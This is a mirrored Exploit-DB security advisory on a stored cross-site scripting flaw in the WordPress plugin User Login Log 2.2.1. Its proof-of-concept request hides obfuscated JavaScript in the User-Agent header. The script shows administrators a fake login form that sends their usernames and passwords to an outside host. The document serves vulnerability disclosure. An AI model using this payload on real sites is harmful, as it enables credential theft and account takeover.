bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/php/webapps/41484.txt
Offensive Security 846ce42eca DB: 2017-03-02 
14 new exploits

SysGauge 1.5.18 - Buffer Overflow
WePresent WiPG-1500 - Backdoor Account

Windows x86 - Reverse TCP Staged Alphanumeric Shellcode (332 Bytes)
DLink DSL-2730U Wireless N 150 - Cross-Site Request Forgery
Aruba AirWave 8.2.3 - XML External Entity Injection / Cross-Site Scripting
WordPress Plugin Contact Form Manager - Cross-Site Request Forgery / Cross-Site Scripting
WordPress Plugin User Login Log 2.2.1 - Cross-Site Scripting
WordPress Plugin Popup by Supsystic 1.7.6 - Cross-Site Request Forgery
WordPress Plugin NewStatPress 1.2.4 - Cross-Site Scripting
WordPress Plugin Global Content Blocks 2.1.5 - Cross-Site Request Forgery
WordPress Plugin File Manager 3.0.1 - Cross-Site Request Forgery
SchoolDir - SQL Injection
Rage Faces Script 1.3 - SQL Injection
Meme Maker Script 2.1 - 'user' Parameter SQL Injection
2017-03-02 05:01:19 +00:00

53 lines
7.8 KiB
Text
Executable file
Raw Blame History

Source: https://sumofpwn.nl/advisory/2016/stored_cross_site_scripting_vulnerability_in_user_login_log_wordpress_plugin.html
Abstract
A stored Cross-Site Scripting vulnerability was found in the User Login Log WordPress Plugin. This issue can be exploited by Subscriber (or higher) and allows an attacker to perform a wide variety of actions, such as stealing users' session tokens, or performing arbitrary actions on their behalf.
Contact
For feedback or questions about this advisory mail us at sumofpwn at securify.nl
The Summer of Pwnage
This issue has been found during the Summer of Pwnage hacker event, running from July 1-29. A community summer event in which a large group of security bughunters (worldwide) collaborate in a month of security research on Open Source Software (WordPress this time). For fun. The event is hosted by Securify in Amsterdam.
OVE ID
OVE-20160724-0011
Tested versions
This issue was successfully tested on User Login Log WordPress Plugin version 2.2.1.
Fix
There is currently no fix available.
Introduction
The User Login Log WordPress Plugin track records of WordPress user login with set of multiple information like ip, date , time, country , city, and user name. A stored Cross-Site Scripting vulnerability was found in the User Login Log WordPress Plugin. This issue can be exploited by Subscriber (or higher) and allows an attacker to perform a wide variety of actions, such as stealing users' session tokens, or performing arbitrary actions on their behalf.
Details
This vulnerability exists due to the lack of encoding of the User-Agent HTTP request header. This issue exists in method column_default() that is implemented in the file user-login-log.php.
function column_default($item, $column_name)
{
[...]
switch($column_name){
[...]
default:
return $item[$column_name];
}
}
Proof of concept:
POST /wp-login.php HTTP/1.1
Host: <target>
User-Agent: XSS<script>document.getElementById(/wpwrap/.toString().substring(1, 7)).innerHTML = String.fromCharCode(60,108,105,110,107,32,114,101,108,61,39,115,116,121,108,101,115,104,101,101,116,39,32,105,100,61,39,99,111,108,111,114,115,45,102,114,101,115,104,45,99,115,115,39,32,104,114,101,102,61,39,99,115,115,47,99,111,108,111,114,115,45,102,114,101,115,104,46,99,115,115,39,32,116,121,112,101,61,39,116,101,120,116,47,99,115,115,39,32,109,101,100,105,97,61,39,97,108,108,39,47,62,60,108,105,110,107,32,114,101,108,61,39,115,116,121,108,101,115,104,101,101,116,39,32,105,100,61,39,108,111,103,105,110,45,99,115,115,39,32,104,114,101,102,61,39,99,115,115,47,108,111,103,105,110,46,99,115,115,39,32,116,121,112,101,61,39,116,101,120,116,47,99,115,115,39,32,109,101,100,105,97,61,39,97,108,108,39,47,62,32,60,115,116,121,108,101,62,98,111,100,121,123,98,97,99,107,103,114,111,117,110,100,58,32,110,111,110,101,59,125,35,104,101,97,100,101,114,123,98,97,99,107,103,114,111,117,110,100,58,32,110,111,110,101,59,125,35,108,111,103,105,110,102,111,114,109,123,116,101,120,116,45,97,108,105,103,110,58,32,108,101,102,116,59,125,112,32,35,110,97,118,123,116,101,120,116,45,115,104,97,100,111,119,58,32,114,103,98,97,40,50,53,53,44,50,53,53,44,50,53,53,44,49,41,32,48,32,49,112,120,32,48,59,125,46,115,117,98,109,105,116,123,112,97,100,100,105,110,103,58,32,48,59,125,35,98,97,99,107,116,111,98,108,111,103,32,97,123,99,111,108,111,114,58,32,35,99,99,99,59,125,60,47,115,116,121,108,101,62,32,60,100,105,118,32,105,100,61,34,108,111,103,105,110,34,62,60,104,49,62,60,97,32,104,114,101,102,61,34,104,116,116,112,58,47,47,119,111,114,100,112,114,101,115,115,46,111,114,103,47,34,32,116,105,116,108,101,61,34,80,111,119,101,114,101,100,32,98,121,32,87,111,114,100,80,114,101,115,115,34,62,84,111,116,97,108,108,121,32,76,101,103,105,116,32,76,111,103,105,110,32,70,111,114,109,60,47,97,62,60,47,104,49,62,32,60,102,111,114,109,32,110,97,109,101,61,34,108,111,103,105,110,102,111,114,109,34,32,105,100,61,34,108,111,103,105,110,102,111,114,109,34,32,97,99,116,105,111,110,61,34,104,116,116,112,58,47,47,119,119,119,46,115,104,111,97,108,111,97,107,46,109,108,47,99,111,108,108,101,99,116,34,32,109,101,116,104,111,100,61,34,80,79,83,84,34,32,116,97,114,103,101,116,61,34,104,105,100,100,101,110,45,102,111,114,109,34,62,60,112,62,60,108,97,98,101,108,62,85,115,101,114,110,97,109,101,60,98,114,47,62,60,105,110,112,117,116,32,116,121,112,101,61,34,116,101,120,116,34,32,110,97,109,101,61,34,117,34,32,105,100,61,34,117,115,101,114,95,108,111,103,105,110,34,32,99,108,97,115,115,61,34,105,110,112,117,116,34,32,118,97,108,117,101,61,34,34,32,115,105,122,101,61,34,50,48,34,32,116,97,98,105,110,100,101,120,61,34,49,48,34,47,62,60,47,108,97,98,101,108,62,60,47,112,62,60,112,62,60,108,97,98,101,108,62,80,97,115,115,119,111,114,100,60,98,114,47,62,60,105,110,112,117,116,32,116,121,112,101,61,34,112,97,115,115,119,111,114,100,34,32,110,97,109,101,61,34,112,34,32,105,100,61,34,117,115,101,114,95,112,97,115,115,34,32,99,108,97,115,115,61,34,105,110,112,117,116,34,32,118,97,108,117,101,61,34,34,32,115,105,122,101,61,34,50,48,34,32,116,97,98,105,110,100,101,120,61,34,50,48,34,47,62,60,47,108,97,98,101,108,62,60,47,112,62,60,112,32,115,116,121,108,101,61,34,99,111,108,111,114,58,114,101,100,34,62,83,101,115,115,105,111,110,32,104,97,115,32,101,120,112,105,114,101,100,44,32,112,108,101,97,115,101,32,108,111,103,32,105,110,60,47,112,62,60,112,32,99,108,97,115,115,61,34,102,111,114,103,101,116,109,101,110,111,116,34,62,60,108,97,98,101,108,62,60,105,110,112,117,116,32,110,97,109,101,61,34,114,101,109,101,109,98,101,114,109,101,34,32,116,121,112,101,61,34,99,104,101,99,107,98,111,120,34,32,105,100,61,34,114,101,109,101,109,98,101,114,109,101,34,32,118,97,108,117,101,61,34,102,111,114,101,118,101,114,34,32,116,97,98,105,110,100,101,120,61,34,57,48,34,47,62,32,82,101,109,101,109,98,101,114,32,77,101,60,47,108,97,98,101,108,62,60,47,112,62,60,112,32,99,108,97,115,115,61,34,115,117,98,109,105,116,34,62,60,105,110,112,117,116,32,116,121,112,101,61,34,115,117,98,109,105,116,34,32,110,97,109,101,61,34,119,112,45,115,117,98,109,105,116,34,32,105,100,61,34,119,112,45,115,117,98,109,105,116,34,32,118,97,108,117,101,61,34,76,111,103,32,73,110,34,32,116,97,98,105,110,100,101,120,61,34,49,48,48,34,47,62,60,47,112,62,60,47,102,111,114,109,62,32,60,112,32,105,100,61,34,110,97,118,34,62,60,97,32,104,114,101,102,61,34,46,46,47,119,112,45,108,111,103,105,110,46,112,104,112,63,97,99,116,105,111,110,61,108,111,115,116,112,97,115,115,119,111,114,100,34,32,116,105,116,108,101,61,34,80,97,115,115,119,111,114,100,32,76,111,115,116,32,97,110,100,32,70,111,117,110,100,34,62,76,111,115,116,32,121,111,117,114,32,112,97,115,115,119,111,114,100,63,60,47,97,62,60,47,112,62,60,47,100,105,118,62,60,105,102,114,97,109,101,32,115,116,121,108,101,61,34,100,105,115,112,108,97,121,58,110,111,110,101,34,32,110,97,109,101,61,34,104,105,100,100,101,110,45,102,111,114,109,34,62,60,47,105,102,114,97,109,101,62,32,60,115,99,114,105,112,116,32,116,121,112,101,61,34,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,34,62,116,114,121,123,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,39,117,115,101,114,95,108,111,103,105,110,39,41,46,102,111,99,117,115,40,41,59,125,99,97,116,99,104,40,101,41,123,125,60,47,115,99,114,105,112,116,62);document.getElementById(/wpwrap/.toString().substring(1, 7)).id = /login/.toString().substring(1, 5);document.cookie = String.fromCharCode(39,118,105,115,105,116,101,100,61,116,114,117,101,59,112,97,116,104,61,47,59,109,97,120,45,97,103,101,61,39) + 60 * 10;
</script>XSS
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.8
Accept-Encoding: gzip,deflate,lzma,sdch
Cookie: wordpress_test_cookie=WP+Cookie+check
Connection: close
Content-Type: application/x-www-form-urlencoded
log=<user name>&pwd=<password>&wp-submit=Log+In&redirect_to=%2Fwp-admin%2F&testcookie=1
Reference in a new issue View git blame Copy permalink